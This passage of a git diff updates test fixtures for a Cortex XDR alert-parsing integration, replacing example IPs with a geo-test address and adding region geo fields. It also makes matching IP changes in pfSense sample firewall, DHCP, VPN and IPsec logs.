y":"browser-based","fw_vsys":"vsys1","fw_xff":null,"fw_misc":"7.7.7.7/cgi-bin/config.exp","fw_is_phishing":"No","dst_agent_id":"6.6.6.6","dst_causality_actor_process_execution_time":null,"dns_query_name":null,"dst_action_external_hostname":null,"dst_action_country":"US","dst_action_external_port":null,"contains_featured_host":"NO","contains_featured_user":"NO","contains_featured_ip":"NO","image_name":null,"container_id":null,"cluster_name":null,"user_name":null},"alert_id":"2879211","detection_timestamp":1626346849000,"name":"Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability","category":"Vulnerability","endpoint_id":"192.168.2.2","description":"Info-Leak (7.7.7.7/cgi-bin/config.exp)","host_ip":["192.168.2.2"],"host_name":null,"mac_addresses":["ab:ae:f5:sd:c8:6a"],"source":"PAN NGFW","action":"BLOCKED_9","action_pretty":"Prevented (Terminated The Session And Sent a TCP Reset To Both Sides Of The Connection)"} {"external_id":"803fd786a6ba49c1bb642e3ba91a93c7","severity":"medium","matching_status":"MATCHED","end_match_attempt_ts":1582275027631,"local_insert_ts":1582274996871,"bioc_indicator":null,"matching_service_rule_id":null,"attempt_counter":1,"bioc_category_enum_key":null,"is_whitelisted":false,"starred":false,"deduplicate_tokens":null,"filter_rule_id":null,"mitre_technique_id_and_name":null,"mitre_tactic_id_and_name":null,"agent_version":null,"agent_device_domain":null,"agent_fqdn":null,"agent_os_type":"Windows","agent_os_sub_type":null,"agent_data_collection_status":true,"mac":null,"events":{"agent_install_type":"STANDARD","agent_host_boot_time":null,"event_sub_type":null,"module_id":null,"association_strength":null,"dst_association_strength":null,"story_id":null,"event_id":null,"event_type":"Process Execution","event_timestamp":1582274179588,"actor_process_instance_id":"AdXokfzvxXMAAEB8AAAAAA==","actor_process_image_path":"C:\\Users\\testuser\\Desktop\\unlocker-master\\gettools.exe","actor_process_image_name":"gettools.exe","actor_process_command_line":"gettools.exe","actor_process_signature_status":"Unsigned","actor_process_signature_vendor":"N/A","actor_process_image_sha256":"4FEAF3340B663CCE76EE09D7621E43C8A0A4C89C1DE4734E2EF2C903C29C366F","actor_process_image_md5":null,"actor_process_causality_id":"AdXokeompQUAAECsAAAAAA==","actor_causality_id":null,"actor_process_os_pid":16508,"actor_thread_thread_id":null,"causality_actor_process_image_name":"cmd.exe","causality_actor_process_command_line":"\"C:\\WINDOWS\\System32\\cmd.exe\" /C \"C:\\Users\\testuser\\Desktop\\unlocker-master\\win-install.cmd\" ","causality_actor_process_image_path":"C:\\Windows\\System32\\cmd.exe","causality_actor_process_signature_vendor":"Microsoft Corporation","causality_actor_process_signature_status":"Signed","causality_actor_causality_id":"AdXokeompQUAAECsAAAAAA==","causality_actor_process_execution_time":1582274147424,"causality_actor_process_image_md5":null,"causality_actor_process_image_sha256":"9a7c58bd98d70631aa1473f7b57b426db367d72429a5455b433a05ee251f3236","action_file_path":null,"action_file_name":null,"action_file_md5":null,"action_file_sha256":null,"action_file_macro_sha256":null,"action_registry_data":null,"action_registry_key_name":null,"action_registry_value_name":null,"action_registry_full_key":null,"action_local_ip":null,"action_local_port":null,"action_remote_ip":null,"action_remote_port":null,"action_external_hostname":null,"action_country":null,"action_process_instance_id":null,"action_process_causality_id":null,"action_process_image_name":null,"action_process_image_sha256":null,"action_process_image_command_line":null,"action_process_signature_status":"N/A","action_process_signature_vendor":"N/A","os_actor_effective_username":null,"os_actor_process_instance_id":null,"os_actor_process_image_path":null,"os_actor_process_image_name":null,"os_actor_process_command_line":null,"os_actor_process_signature_status":null,"os_actor_process_signature_vendor":null,"os_actor_process_image_sha256":null,"os_actor_process_causality_id":null,"os_actor_causality_id":null,"os_actor_process_os_pid":null,"os_actor_thread_thread_id":null,"fw_app_id":null,"fw_interface_from":null,"fw_interface_to":null,"fw_rule":null,"fw_rule_id":null,"fw_device_name":null,"fw_serial_number":null,"fw_url_domain":null,"fw_email_subject":null,"fw_email_sender":null,"fw_email_recipient":null,"fw_app_subcategory":null,"fw_app_category":null,"fw_app_technology":null,"fw_vsys":null,"fw_xff":null,"fw_misc":null,"fw_is_phishing":"N/A","dst_agent_id":null,"dst_causality_actor_process_execution_time":null,"dns_query_name":null,"dst_action_external_hostname":null,"dst_action_country":null,"dst_action_external_port":null,"contains_featured_host":null,"contains_featured_user":null,"contains_featured_ip":null,"image_name":null,"container_id":null,"cluster_name":null,"user_name":null},"alert_id":"389045","detection_timestamp":1582274179588,"name":"WildFire Malware","category":"Malware","endpoint_id":"7e2caa3cfcba492ec3b7468356699991","description":"Suspicious executable detected","host_ip":["192.168.2.2"],"host_name":"test-hostname","mac_addresses":null,"source":"XDR Agent","action":"BLOCKED","action_pretty":"Prevented (Blocked)"} diff --git a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json index d841c58eda6..d00123405c3 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json +++ b/packages/panw_cortex_xdr/data_stream/alerts/_dev/test/pipeline/test-panw-xdr.log-expected.json @@ -28,7 +28,7 @@ "fw_url_domain": "9.9.9.9", "event_type": "Network Connections", "event_id": "MzYzOTQ0MDE1MDI4OTE3NDUyNA==", - "action_external_hostname": "8.8.8.8", + "action_external_hostname": "175.16.199.1", "fw_app_subcategory": "internet-utility", "os_actor_process_signature_status": "N/A", "agent_install_type": "NA", @@ -51,22 +51,24 @@ }, "destination": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "US" + "country_iso_code": "CN" }, "as": { - "number": 15169, + "number": 4837, "organization": { - "name": "Google LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 443, - "ip": "8.8.8.8" + "ip": "175.16.199.1" }, "rule": { "name": "INTERNET_INTERNET_GlobalProtect-443" @@ -111,8 +113,8 @@ "event": { "severity": 4, "reason": "Info-Leak (7.7.7.7/cgi-bin/config.exp)", - "ingested": "2021-10-14T10:31:16.914781604Z", - "original": "{\"external_id\":\"396239671\",\"severity\":\"high\",\"matching_status\":\"UNMATCHABLE\",\"end_match_attempt_ts\":null,\"local_insert_ts\":1626347122923,\"bioc_indicator\":null,\"matching_service_rule_id\":null,\"attempt_counter\":null,\"bioc_category_enum_key\":null,\"is_whitelisted\":false,\"starred\":false,\"deduplicate_tokens\":\"af4e477c1e284c3f9b1fff340fddb4d0,57f0d1f4096a45bdb4cd8d4b8a626f15\",\"filter_rule_id\":null,\"mitre_technique_id_and_name\":null,\"mitre_tactic_id_and_name\":null,\"agent_version\":null,\"agent_device_domain\":null,\"agent_fqdn\":null,\"agent_os_type\":\"NO_HOST\",\"agent_os_sub_type\":null,\"agent_data_collection_status\":null,\"mac\":\"4c:ae:a3:8e:c8:6a\",\"events\":{\"agent_install_type\":\"NA\",\"agent_host_boot_time\":null,\"event_sub_type\":null,\"module_id\":null,\"association_strength\":10,\"dst_association_strength\":10,\"story_id\":\"MzYzOTQ0MDE1MDI4OTE3NDUyNA==\",\"event_id\":\"MzYzOTQ0MDE1MDI4OTE3NDUyNA==\",\"event_type\":\"Network Connections\",\"event_timestamp\":1626346867000,\"actor_process_instance_id\":null,\"actor_process_image_path\":null,\"actor_process_image_name\":null,\"actor_process_command_line\":null,\"actor_process_signature_status\":\"N/A\",\"actor_process_signature_vendor\":null,\"actor_process_image_sha256\":null,\"actor_process_image_md5\":null,\"actor_process_causality_id\":null,\"actor_causality_id\":null,\"actor_process_os_pid\":null,\"actor_thread_thread_id\":null,\"causality_actor_process_image_name\":null,\"causality_actor_process_command_line\":null,\"causality_actor_process_image_path\":null,\"causality_actor_process_signature_vendor\":null,\"causality_actor_process_signature_status\":\"N/A\",\"causality_actor_causality_id\":null,\"causality_actor_process_execution_time\":null,\"causality_actor_process_image_md5\":null,\"causality_actor_process_image_sha256\":null,\"action_file_path\":null,\"action_file_name\":null,\"action_file_md5\":null,\"action_file_sha256\":null,\"action_file_macro_sha256\":null,\"action_registry_data\":null,\"action_registry_key_name\":null,\"action_registry_value_name\":null,\"action_registry_full_key\":null,\"action_local_ip\":\"10.10.10.10\",\"action_local_port\":58642,\"action_remote_ip\":\"8.8.8.8\",\"action_remote_port\":443,\"action_external_hostname\":\"8.8.8.8\",\"action_country\":\"DK\",\"action_process_instance_id\":null,\"action_process_causality_id\":null,\"action_process_image_name\":null,\"action_process_image_sha256\":null,\"action_process_image_command_line\":null,\"action_process_signature_status\":\"N/A\",\"action_process_signature_vendor\":null,\"os_actor_effective_username\":null,\"os_actor_process_instance_id\":null,\"os_actor_process_image_path\":null,\"os_actor_process_image_name\":null,\"os_actor_process_command_line\":null,\"os_actor_process_signature_status\":\"N/A\",\"os_actor_process_signature_vendor\":null,\"os_actor_process_image_sha256\":null,\"os_actor_process_causality_id\":null,\"os_actor_causality_id\":null,\"os_actor_process_os_pid\":null,\"os_actor_thread_thread_id\":null,\"fw_app_id\":\"web-browsing\",\"fw_interface_from\":\"INTERNET\",\"fw_interface_to\":\"INTERNET\",\"fw_rule\":\"INTERNET_INTERNET_GlobalProtect-443\",\"fw_rule_id\":null,\"fw_device_name\":\"FW-DEVICE_NAME\",\"fw_serial_number\":\"12352345\",\"fw_url_domain\":\"9.9.9.9\",\"fw_email_subject\":null,\"fw_email_sender\":null,\"fw_email_recipient\":null,\"fw_app_subcategory\":\"internet-utility\",\"fw_app_category\":\"general-internet\",\"fw_app_technology\":\"browser-based\",\"fw_vsys\":\"vsys1\",\"fw_xff\":null,\"fw_misc\":\"7.7.7.7/cgi-bin/config.exp\",\"fw_is_phishing\":\"No\",\"dst_agent_id\":\"6.6.6.6\",\"dst_causality_actor_process_execution_time\":null,\"dns_query_name\":null,\"dst_action_external_hostname\":null,\"dst_action_country\":\"US\",\"dst_action_external_port\":null,\"contains_featured_host\":\"NO\",\"contains_featured_user\":\"NO\",\"contains_featured_ip\":\"NO\",\"image_name\":null,\"container_id\":null,\"cluster_name\":null,\"user_name\":null},\"alert_id\":\"2879211\",\"detection_timestamp\":1626346849000,\"name\":\"Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability\",\"category\":\"Vulnerability\",\"endpoint_id\":\"192.168.2.2\",\"description\":\"Info-Leak (7.7.7.7/cgi-bin/config.exp)\",\"host_ip\":[\"192.168.2.2\"],\"host_name\":null,\"mac_addresses\":[\"ab:ae:f5:sd:c8:6a\"],\"source\":\"PAN NGFW\",\"action\":\"BLOCKED_9\",\"action_pretty\":\"Prevented (Terminated The Session And Sent a TCP Reset To Both Sides Of The Connection)\"}", + "ingested": "2021-12-09T13:44:33.525006400Z", + "original": "{\"external_id\":\"396239671\",\"severity\":\"high\",\"matching_status\":\"UNMATCHABLE\",\"end_match_attempt_ts\":null,\"local_insert_ts\":1626347122923,\"bioc_indicator\":null,\"matching_service_rule_id\":null,\"attempt_counter\":null,\"bioc_category_enum_key\":null,\"is_whitelisted\":false,\"starred\":false,\"deduplicate_tokens\":\"af4e477c1e284c3f9b1fff340fddb4d0,57f0d1f4096a45bdb4cd8d4b8a626f15\",\"filter_rule_id\":null,\"mitre_technique_id_and_name\":null,\"mitre_tactic_id_and_name\":null,\"agent_version\":null,\"agent_device_domain\":null,\"agent_fqdn\":null,\"agent_os_type\":\"NO_HOST\",\"agent_os_sub_type\":null,\"agent_data_collection_status\":null,\"mac\":\"4c:ae:a3:8e:c8:6a\",\"events\":{\"agent_install_type\":\"NA\",\"agent_host_boot_time\":null,\"event_sub_type\":null,\"module_id\":null,\"association_strength\":10,\"dst_association_strength\":10,\"story_id\":\"MzYzOTQ0MDE1MDI4OTE3NDUyNA==\",\"event_id\":\"MzYzOTQ0MDE1MDI4OTE3NDUyNA==\",\"event_type\":\"Network Connections\",\"event_timestamp\":1626346867000,\"actor_process_instance_id\":null,\"actor_process_image_path\":null,\"actor_process_image_name\":null,\"actor_process_command_line\":null,\"actor_process_signature_status\":\"N/A\",\"actor_process_signature_vendor\":null,\"actor_process_image_sha256\":null,\"actor_process_image_md5\":null,\"actor_process_causality_id\":null,\"actor_causality_id\":null,\"actor_process_os_pid\":null,\"actor_thread_thread_id\":null,\"causality_actor_process_image_name\":null,\"causality_actor_process_command_line\":null,\"causality_actor_process_image_path\":null,\"causality_actor_process_signature_vendor\":null,\"causality_actor_process_signature_status\":\"N/A\",\"causality_actor_causality_id\":null,\"causality_actor_process_execution_time\":null,\"causality_actor_process_image_md5\":null,\"causality_actor_process_image_sha256\":null,\"action_file_path\":null,\"action_file_name\":null,\"action_file_md5\":null,\"action_file_sha256\":null,\"action_file_macro_sha256\":null,\"action_registry_data\":null,\"action_registry_key_name\":null,\"action_registry_value_name\":null,\"action_registry_full_key\":null,\"action_local_ip\":\"10.10.10.10\",\"action_local_port\":58642,\"action_remote_ip\":\"175.16.199.1\",\"action_remote_port\":443,\"action_external_hostname\":\"175.16.199.1\",\"action_country\":\"DK\",\"action_process_instance_id\":null,\"action_process_causality_id\":null,\"action_process_image_name\":null,\"action_process_image_sha256\":null,\"action_process_image_command_line\":null,\"action_process_signature_status\":\"N/A\",\"action_process_signature_vendor\":null,\"os_actor_effective_username\":null,\"os_actor_process_instance_id\":null,\"os_actor_process_image_path\":null,\"os_actor_process_image_name\":null,\"os_actor_process_command_line\":null,\"os_actor_process_signature_status\":\"N/A\",\"os_actor_process_signature_vendor\":null,\"os_actor_process_image_sha256\":null,\"os_actor_process_causality_id\":null,\"os_actor_causality_id\":null,\"os_actor_process_os_pid\":null,\"os_actor_thread_thread_id\":null,\"fw_app_id\":\"web-browsing\",\"fw_interface_from\":\"INTERNET\",\"fw_interface_to\":\"INTERNET\",\"fw_rule\":\"INTERNET_INTERNET_GlobalProtect-443\",\"fw_rule_id\":null,\"fw_device_name\":\"FW-DEVICE_NAME\",\"fw_serial_number\":\"12352345\",\"fw_url_domain\":\"9.9.9.9\",\"fw_email_subject\":null,\"fw_email_sender\":null,\"fw_email_recipient\":null,\"fw_app_subcategory\":\"internet-utility\",\"fw_app_category\":\"general-internet\",\"fw_app_technology\":\"browser-based\",\"fw_vsys\":\"vsys1\",\"fw_xff\":null,\"fw_misc\":\"7.7.7.7/cgi-bin/config.exp\",\"fw_is_phishing\":\"No\",\"dst_agent_id\":\"6.6.6.6\",\"dst_causality_actor_process_execution_time\":null,\"dns_query_name\":null,\"dst_action_external_hostname\":null,\"dst_action_country\":\"US\",\"dst_action_external_port\":null,\"contains_featured_host\":\"NO\",\"contains_featured_user\":\"NO\",\"contains_featured_ip\":\"NO\",\"image_name\":null,\"container_id\":null,\"cluster_name\":null,\"user_name\":null},\"alert_id\":\"2879211\",\"detection_timestamp\":1626346849000,\"name\":\"Cisco RV320/RV325 Router Unauthenticated Configuration Export Vulnerability\",\"category\":\"Vulnerability\",\"endpoint_id\":\"192.168.2.2\",\"description\":\"Info-Leak (7.7.7.7/cgi-bin/config.exp)\",\"host_ip\":[\"192.168.2.2\"],\"host_name\":null,\"mac_addresses\":[\"ab:ae:f5:sd:c8:6a\"],\"source\":\"PAN NGFW\",\"action\":\"BLOCKED_9\",\"action_pretty\":\"Prevented (Terminated The Session And Sent a TCP Reset To Both Sides Of The Connection)\"}", "kind": "alert", "created": "2021-07-15T11:00:49.000Z", "action": "BLOCKED_9", @@ -201,7 +203,7 @@ "event": { "severity": 3, "reason": "Suspicious executable detected", - "ingested": "2021-10-14T10:31:16.914805749Z", + "ingested": "2021-12-09T13:44:33.525009700Z", "original": "{\"external_id\":\"803fd786a6ba49c1bb642e3ba91a93c7\",\"severity\":\"medium\",\"matching_status\":\"MATCHED\",\"end_match_attempt_ts\":1582275027631,\"local_insert_ts\":1582274996871,\"bioc_indicator\":null,\"matching_service_rule_id\":null,\"attempt_counter\":1,\"bioc_category_enum_key\":null,\"is_whitelisted\":false,\"starred\":false,\"deduplicate_tokens\":null,\"filter_rule_id\":null,\"mitre_technique_id_and_name\":null,\"mitre_tactic_id_and_name\":null,\"agent_version\":null,\"agent_device_domain\":null,\"agent_fqdn\":null,\"agent_os_type\":\"Windows\",\"agent_os_sub_type\":null,\"agent_data_collection_status\":true,\"mac\":null,\"events\":{\"agent_install_type\":\"STANDARD\",\"agent_host_boot_time\":null,\"event_sub_type\":null,\"module_id\":null,\"association_strength\":null,\"dst_association_strength\":null,\"story_id\":null,\"event_id\":null,\"event_type\":\"Process Execution\",\"event_timestamp\":1582274179588,\"actor_process_instance_id\":\"AdXokfzvxXMAAEB8AAAAAA==\",\"actor_process_image_path\":\"C:\\\\Users\\\\testuser\\\\Desktop\\\\unlocker-master\\\\gettools.exe\",\"actor_process_image_name\":\"gettools.exe\",\"actor_process_command_line\":\"gettools.exe\",\"actor_process_signature_status\":\"Unsigned\",\"actor_process_signature_vendor\":\"N/A\",\"actor_process_image_sha256\":\"4FEAF3340B663CCE76EE09D7621E43C8A0A4C89C1DE4734E2EF2C903C29C366F\",\"actor_process_image_md5\":null,\"actor_process_causality_id\":\"AdXokeompQUAAECsAAAAAA==\",\"actor_causality_id\":null,\"actor_process_os_pid\":16508,\"actor_thread_thread_id\":null,\"causality_actor_process_image_name\":\"cmd.exe\",\"causality_actor_process_command_line\":\"\\\"C:\\\\WINDOWS\\\\System32\\\\cmd.exe\\\" /C \\\"C:\\\\Users\\\\testuser\\\\Desktop\\\\unlocker-master\\\\win-install.cmd\\\" \",\"causality_actor_process_image_path\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"causality_actor_process_signature_vendor\":\"Microsoft Corporation\",\"causality_actor_process_signature_status\":\"Signed\",\"causality_actor_causality_id\":\"AdXokeompQUAAECsAAAAAA==\",\"causality_actor_process_execution_time\":1582274147424,\"causality_actor_process_image_md5\":null,\"causality_actor_process_image_sha256\":\"9a7c58bd98d70631aa1473f7b57b426db367d72429a5455b433a05ee251f3236\",\"action_file_path\":null,\"action_file_name\":null,\"action_file_md5\":null,\"action_file_sha256\":null,\"action_file_macro_sha256\":null,\"action_registry_data\":null,\"action_registry_key_name\":null,\"action_registry_value_name\":null,\"action_registry_full_key\":null,\"action_local_ip\":null,\"action_local_port\":null,\"action_remote_ip\":null,\"action_remote_port\":null,\"action_external_hostname\":null,\"action_country\":null,\"action_process_instance_id\":null,\"action_process_causality_id\":null,\"action_process_image_name\":null,\"action_process_image_sha256\":null,\"action_process_image_command_line\":null,\"action_process_signature_status\":\"N/A\",\"action_process_signature_vendor\":\"N/A\",\"os_actor_effective_username\":null,\"os_actor_process_instance_id\":null,\"os_actor_process_image_path\":null,\"os_actor_process_image_name\":null,\"os_actor_process_command_line\":null,\"os_actor_process_signature_status\":null,\"os_actor_process_signature_vendor\":null,\"os_actor_process_image_sha256\":null,\"os_actor_process_causality_id\":null,\"os_actor_causality_id\":null,\"os_actor_process_os_pid\":null,\"os_actor_thread_thread_id\":null,\"fw_app_id\":null,\"fw_interface_from\":null,\"fw_interface_to\":null,\"fw_rule\":null,\"fw_rule_id\":null,\"fw_device_name\":null,\"fw_serial_number\":null,\"fw_url_domain\":null,\"fw_email_subject\":null,\"fw_email_sender\":null,\"fw_email_recipient\":null,\"fw_app_subcategory\":null,\"fw_app_category\":null,\"fw_app_technology\":null,\"fw_vsys\":null,\"fw_xff\":null,\"fw_misc\":null,\"fw_is_phishing\":\"N/A\",\"dst_agent_id\":null,\"dst_causality_actor_process_execution_time\":null,\"dns_query_name\":null,\"dst_action_external_hostname\":null,\"dst_action_country\":null,\"dst_action_external_port\":null,\"contains_featured_host\":null,\"contains_featured_user\":null,\"contains_featured_ip\":null,\"image_name\":null,\"container_id\":null,\"cluster_name\":null,\"user_name\":null},\"alert_id\":\"389045\",\"detection_timestamp\":1582274179588,\"name\":\"WildFire Malware\",\"category\":\"Malware\",\"endpoint_id\":\"7e2caa3cfcba492ec3b7468356699991\",\"description\":\"Suspicious executable detected\",\"host_ip\":[\"192.168.2.2\"],\"host_name\":\"test-hostname\",\"mac_addresses\":null,\"source\":\"XDR Agent\",\"action\":\"BLOCKED\",\"action_pretty\":\"Prevented (Blocked)\"}", "kind": "alert", "created": "2020-02-21T08:36:19.588Z", diff --git a/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml b/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml index 2a4fbd5c614..1fc7ce8e8ec 100644 --- a/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml +++ b/packages/panw_cortex_xdr/data_stream/alerts/fields/ecs.yml @@ -50,6 +50,10 @@ external: ecs - name: destination.geo.country_name external: ecs +- name: destination.geo.region_iso_code + external: ecs +- name: destination.geo.region_name + external: ecs - name: destination.geo.location description: Longitude and latitude. example: '{ "lon": -73.614830, "lat": 45.505918 }' diff --git a/packages/panw_cortex_xdr/docs/README.md b/packages/panw_cortex_xdr/docs/README.md index 9e7d2daaa37..a2ec3ad0721 100644 --- a/packages/panw_cortex_xdr/docs/README.md +++ b/packages/panw_cortex_xdr/docs/README.md @@ -38,6 +38,8 @@ https://docs.paloaltonetworks.com/cortex/cortex-xdr/cortex-xdr-api/cortex-xdr-ap | destination.geo.country_iso_code | Country ISO code. | keyword | | destination.geo.country_name | Country name. | keyword | | destination.geo.location | Longitude and latitude. | geo_point | +| destination.geo.region_iso_code | Region ISO code. | keyword | +| destination.geo.region_name | Region name. | keyword | | destination.ip | IP address of the destination (IPv4 or IPv6). | ip | | destination.port | Port of the destination. | long | | dns.question.name | The name being queried. If the name field contains non-printable characters (below 32 or above 126), those characters should be represented as escaped base 10 integers (\DDD). Back slashes and quotes should be escaped. Tabs, carriage returns, and line feeds should be converted to \t, \r, and \n respectively. | keyword | diff --git a/packages/panw_cortex_xdr/manifest.yml b/packages/panw_cortex_xdr/manifest.yml index 9505b0c0f24..8a75814550d 100644 --- a/packages/panw_cortex_xdr/manifest.yml +++ b/packages/panw_cortex_xdr/manifest.yml @@ -1,6 +1,6 @@ name: panw_cortex_xdr title: Palo Alto Cortex XDR Logs -version: 0.2.4 +version: 0.2.5 release: beta description: Collect and parse logs from Palo Alto Cortex XDR API with Elastic Agent. type: integration diff --git a/packages/pfsense/_dev/deploy/docker/sample_logs/pfsense.log b/packages/pfsense/_dev/deploy/docker/sample_logs/pfsense.log index c796354bd71..47096d9c78e 100644 --- a/packages/pfsense/_dev/deploy/docker/sample_logs/pfsense.log +++ b/packages/pfsense/_dev/deploy/docker/sample_logs/pfsense.log @@ -1,15 +1,15 @@ -<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:30 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,216.229.4.66,123,123,56 -<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale -<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,1.0.0.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,12617,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49724,853,0,S,1891286705,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:30 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32554,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49696,853,0,S,3995901112,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:30 filterlog[72237]: 176,,,1520797901,igb1.27,match,pass,in,4,0xb8,,64,58355,0,none,17,udp,76,10.170.27.27,175.16.199.1,123,123,56 +<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,47260,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49726,853,0,S,2457553480,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,23391,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56584,853,0,S,1118373581,,64240,,mss;sackOK;TS;nop;wscale +<134>Jul 3 19:10:31 filterlog[72237]: 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,547,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,56542,853,0,S,3798927693,,64240,,mss;sackOK;TS;nop;wscale <134>Jul 3 19:10:31 filterlog[72237]: 6,,,1000000105,igb1.27,match,block,in,6,0x00,0xf6279,1,UDP,17,32,fe80::208:9bff:fef3:652b,ff02::1:2,546,547,32 -<134>1 2021-07-03T19:10:14.578288-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale -<134>1 2021-07-03T19:10:14.578309-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale +<134>1 2021-07-03T19:10:14.578288-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,32989,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49652,853,0,S,1818117648,,64240,,mss;sackOK;TS;nop;wscale +<134>1 2021-07-03T19:10:14.578309-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,28831,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49616,853,0,S,3664924520,,64240,,mss;sackOK;TS;nop;wscale <134>1 2021-07-03T19:10:14.578333-05:00 pfSense.example.com filterlog 72237 - - 115,,,1534283903,igb1.27,match,pass,in,4,0x0,,63,29559,0,DF,17,udp,69,10.170.27.50,10.170.27.1,52797,53,49 -<134>1 2021-07-03T19:10:14.578227-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale -<134>1 2021-07-03T19:10:14.578265-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,1.1.1.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale +<134>1 2021-07-03T19:10:14.578227-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,39730,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49636,853,0,S,2795136451,,64240,,mss;sackOK;TS;nop;wscale +<134>1 2021-07-03T19:10:14.578265-05:00 pfSense.example.com filterlog 72237 - - 146,,,1535324496,igb1.12,match,block,in,4,0x0,,63,18713,0,DF,6,tcp,60,10.170.12.50,175.16.199.1,49668,853,0,S,1623026256,,64240,,mss;sackOK;TS;nop;wscale <134>1 2021-07-03T19:10:14.578380-05:00 pfSense.example.com filterlog 72237 - - 118,,,1534283903,igb1.12,match,pass,in,4,0x0,,64,58337,0,DF,6,tcp,64,10.170.12.21,127.0.0.1,62132,53,0,S,3671644853,,32768,,mss;nop;wscale;sackOK;nop;nop;nop;nop;TS <190>Jul 4 09:39:40 dhcpd[64305]: DHCPDISCOVER from 4c:55:41:a0:fa:99 via eth0.60 <190>Jul 4 09:39:41 dhcpd[64305]: DHCPOFFER on 10.150.60.56 to 4c:55:41:a0:fa:99 (computer-name) via eth0.60 @@ -28,12 +28,12 @@ <30>1 2021-07-03T23:01:56.547481-05:00 pfSense.example.com charon 18610 - - 07[CFG] rekey_packets = 0 <30>1 2021-07-03T23:01:56.547485-05:00 pfSense.example.com charon 18610 - - 07[CFG] life_packets = 0 <30>1 2021-07-03T23:01:56.547489-05:00 pfSense.example.com charon 18610 - - 07[CFG] rand_packets = 0 -<30>1 2021-07-03T23:08:00.777042-05:00 pfSense.example.com charon 18610 - - 14[NET] sending packet: from 28.130.181.102[500] to 90.92.7.206[500] (464 bytes) +<30>1 2021-07-03T23:08:00.777042-05:00 pfSense.example.com charon 18610 - - 14[NET] sending packet: from 175.16.199.1[500] to 175.16.199.1[500] (464 bytes) <29>Jul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 peer info: IV_SSO=openurl <29>Jul 3 21:42:57 openvpn[66026]: 10.170.120.149:37849 [bob] Peer Connection Initiated with [AF_INET]10.170.120.149:37849 <37>Jul 3 21:42:57 openvpn[19830]: user 'bob' authenticated <29>Jul 3 21:42:57 openvpn[66026]: bob/10.170.120.149:37849 